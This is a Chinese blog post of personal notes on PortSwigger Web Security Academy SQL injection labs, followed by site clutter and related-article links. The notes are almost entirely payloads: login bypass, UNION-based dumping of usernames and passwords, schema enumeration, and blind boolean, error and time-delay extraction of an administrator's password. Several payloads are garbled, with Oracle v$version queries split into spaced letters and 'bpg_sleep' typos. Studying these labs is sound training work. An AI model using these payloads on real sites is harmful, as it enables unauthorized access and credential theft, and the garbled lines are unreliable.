PortSwigger SQL injection

已于 2023-04-14 09:44:15 修改
阅读量415 收藏
点赞数
分类专栏: Bug Bounty PortSwigger 文章标签: sql 数据库 mysql
于 2023-04-14 09:38:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mengzh620/article/details/130145085
版权

1.Retrieval of hidden data ---- Modify the category parameter, giving it the value  '+OR+1=1-- 能看到所有的目录

  1. administrator’-- 可以忽略后面的 administrator%27–

3.determining the number of columns returned by the query 'UNION+SELECT+NULL,NULL–
'UNION+SELECT+NULL,NULL+FROM+DUAL–(Oracle)

'+UNION+SELECT+username,+password+FROM+users–

4.retrieving multiple values in a single column username||‘~’||password+FROM+users-- ~是用户名和密码之间的区分,用户自己加上的

  1. 'UNION+SELECT+null,banner+FROM+V v e r s i o n − − ′ U N I O N + S E L E C T + b a n n e r , n u l l + F R O M + V version-- 'UNION+SELECT+banner,null+FROM+V versionUNION+SELECT+banner,null+FROM+Vversion–

Database version
Oracle: SELECT banner FROM v v e r s i o n S E L E C T v e r s i o n F R O M v version SELECT version FROM v versionSELECTversionFROMvinstance

           Microsoft:    SELECT @@version  

           PostgreSQL:    SELECT version()  

            MySQL:        SELECT @@version

  1. 之后忽略
    Oracle: –
    Microsoft: #

  2. listing the database contents on non-Oracle databases

'UNION+SELECT+table_name,null+FROM+information_schema.tables–
'UNION+SELECT+column_name,null+FROM+information_schema.columns+WHERE+table_name=‘users_hgapfx’–
'UNION+SELECT+username_qbyhqw,password_wwalgt+FROM+users_hgapfx-

8.listing the database contents on Oracle databases

'UNION+SELECT+table_name,NULL+FROM+ALL_TABLES–
'UNION+SELECT+COLUMN_NAME,NULL+FROM+ALL_TAB_columns+WHERE+table_name=‘USERS_QDVTGN’–
'UNION+SELECT+username_qbyhqw,password_wwalgt+FROM+users_hgapfx-

9.Lab: Blind SQL injection with conditional responses

'AND(SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>n)=‘a’–
'AND(SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>n)='a
—how much letters or numbers in the password

'AND (SELECT substring(password,1,1) FROM users WHERE username=‘administrator’)='a

10.Blind SQL injection with time delays

Oracle dbms_pipe.receive_message((‘a’),10)
Microsoft WAITFOR DELAY ‘0:0:10’
PostgreSQL SELECT pg_sleep(10)
MySQL SELECT SLEEP(10)

'||pg_sleep(10)–

11.Blind SQL injection with conditional errors

‘||+(select+case+when+substr(password,1,1)=‘a’+then+TO_CHAR(1/0)+ELSE+’‘+END+from+users+where+username=‘administrator’)+||’

12.Lab: Blind SQL injection with time delays and information retrieval

‘||pg_sleep(10)||’–

'||(select case when (username=‘administrator’ and substring(password,1,1)=‘a’) then bpg_sleep(10) else bpg_sleep(5) end from users)–

DaisyDragonD
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
portswigger证书
11-19
portswigger证书,der格式、pem格式,转化好的,直接可以用哦! Android设备抓包必备哦!
数据库】数据分析专项练习题库-SQL试卷二
Erathia
08-09 4593
目录 单选题 数据来源:数据分析专项练习题库 单选题 共50题,共99.0分 1.在以下语句中,哪个是查询所有t1表中城市名为空的记录 A.select * from t1 where city_name not null; B.select * from t1 where city_name is not null; C.select * from t1 where city_name null;D.select * from t1 where city_name is null; 本题
PortSwiggerのWeb Security Academy靶场】SQL Injection系列 9th
javagty6778的博客
01-05 82
Lab: Blind SQL injection with conditional responsesUrl: portswigger.net/web-securit…在带着 cookies的后续访问网页时会找到出现的 标志 ==> 无法回显 ==> 采用盲注的方式 0x03 爆破表名 0x04 爆破字段名 无法解决的痛点:函数无法使用(与此同时concat函数可以正常使用);没有无法select出结果(与此同时 无法select出结果)==> 导致的结果:没有办法一次性爆破出所有的select的
PortSwiggerSQL注入实验全记录
leo788的博客
05-12 818
靶场是Burp自带的网站中提供的,本篇主要对sql注入部分进行练习和记录。
Lab: Blind SQL injection with conditional responses PRACTITIONER 带条件响应的SQL盲注靶场复盘
Zeker62的博客
08-18 529
靶场完成目标: This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie. The results of the SQL query are not returned, and no error message
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 5075
BurpSuit官方实验室靶场-SQL注入通关记录。
基于深度学习的sql注入检测系统`内训练模型和推理脚本和环境搭建教程.zip
最新发布
11-01
(1)从官网下载【Burp Suite Pro】(https://portswigger.net/burp); (2)我们首先需要设置`\Demo\demo.log`等日志路径,以便下一步使用爬虫获取到的日志文件; (3) 保持浏览器代理与Burp Suite一致,并开始...
burpsuitezhengshu
02-04
burpsuite safty credenticate service,...................................................................................................
buby:PortSwigger Burp Suite 的 BurpExtender 接口的 JRuby 实现
06-08
说明: Buby 是 JRuby 与 PortSwigger 流行的商业 Web 安全测试工具 Burp Suite 的混搭。 Burp 由使用 BurpExtender API 的 Java 扩展或使用新的嵌入式 JRuby 支持的 JRuby BurpExtender 实现驱动并绑定到 JRuby。 ...
swurg:将OpenAPI文档解析到Burp Suite中以自动执行基于OpenAPI的API安全评估(PortSwigger批准将其包含在其官方BApp Store中)
02-03
Swurg是Burp Suite扩展,专门用于OpenAPI测试。 OpenAPI规范(OAS)为REST API定义了标准的,与编程语言无关的接口描述,使人和计算机都可以发现和理解服务的功能,而无需访问源代码,附加文档或检查网络流量。...
portswiggerSQL注入实验室笔记
m0_69349614的博客
07-06 1194
该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因此您可以使用 UNION 攻击从其他表中检索数据。这种攻击的第一步是确定查询返回的列数。然后,您将在后续实验中使用此技术来构建完整的攻击。要解决该实验,请通过执行SQL 注入 UNION攻击来确定查询返回的列数,该攻击会返回包含空值的附加行。'+ORDER+BY+3--'+UNION+SELECT+NULL,NULL,NULL--该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因
【burpsuite安全练兵场-服务端1】SQL注入-17个实验(全)
热门推荐
12-27 1万+
【BP靶场-服务端-SQL注入】16个实验-万文详细步骤
PortSwiggerのWeb Security Academy靶场】SQL Injection系列 10th1
javagty6778的博客
01-05 251
Lab: Blind SQL injection with conditional errorsUrl: portswigger.net/web-securit…不论如何点击,带与不带cookie,页面(HTTP response)是没有任何变化的;那么我们尝试让他报点错双引号正常回显 ==> 验证了是注入点,并且可以通过报错信息进行帮助的condition判断后续: exp代码 gitee.com/eclipse-ten…END (づ。◕‿‿◕。)づ
Lab: Blind SQL injection with time delays and information retrieval:时间延迟盲注和信息检索两个靶场复盘
Zeker62的博客
08-18 483
Lab: Blind SQL injection with time delays 时间延迟盲注靶场复盘 题目内容 This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie. The results of th
sql盲注 解决_SQL 盲注漏洞
weixin_39943992的博客
12-19 1099
原文来自:PORTSWIGGER WEB SECURITY >> Web Security Academy>>SQL injection >>Blind SQL injection翻译完毕...本部分,我们将描述什么是 SQL 盲注漏洞,并解释发现和利用 SQL 盲注漏洞的多种技术。什么是 SQL 盲注?当应用程序容易收到 SQL 注入,但其 HTTP 响应不包...
(一)SQL注入实例
weixin_43047908的博客
04-09 2045
SQL injection UNION attack, determining the number of columns returned by the query GET /filter?category=Gifts HTTP/1.1 Host: ac691f351f548a1780ec009d00da0072.web-security-academy.net Connection: close Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v=
SQL Blind Injection
土拨鼠挖洞中的博客
06-23 3129
Blind Injection是什么:SQL注入过程中,SQL语句执行后,执行的数据不能回显到前端,此时我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注; 类型基于bool 型:应用程序仅仅根据执行的sql语句返回True(页面)和False(页面); 基于时间型:所以我们利用函数来判断页面是否发生延迟 ,来判断是否发生注入,如果延迟,则执行失败。类似搜索这类请求,boolean注入也无...
portswigger靶场SQL注入实验(上)
m0_51313985的博客
09-09 3108
最近发现一个挺不错的靶场,burpsuite的官方网站在线训练平台 不多说先到第一个系列的实验去一探究竟 麻了,英文界面属实不太友好! 所以我决定用谷歌看题,火狐去操作(主要火狐用习惯了) 第一个系列的实验为SQL注入,先来简单了解一下吧。 什么是SQL注入? SQL 注入是一种 Web 安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导
portswigger靶场SQL注入实验(下)
m0_51313985的博客
10-03 2454
实验9 点击了home之后页面给了回显,猜测后面进行盲注的时候要利用此回显来判断,打开bp吧 注入点在trackingid这,简单判断一下 存在注入,下面判断一下是否存在表users,表里是否存在名为administrator的用户以及密码password有多少字符 为真,存在users表,接着查用户 后面判断password的长度 大于1为真,扩大点看看 大于30无回显,长度应该是小于30的,具体多少跑一下payload吧 选择number范围1-30 到20,在确定了密码的长度之
portswigger Authentication
07-28
PortSwigger是一家网络安全公司,他们开发了一款名为Burp Suite的强大的网络安全测试工具。在Burp Suite中,有一个功能模块是用于进行身份验证测试的,即Authentication模块。这个模块可以帮助安全专业人员测试应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值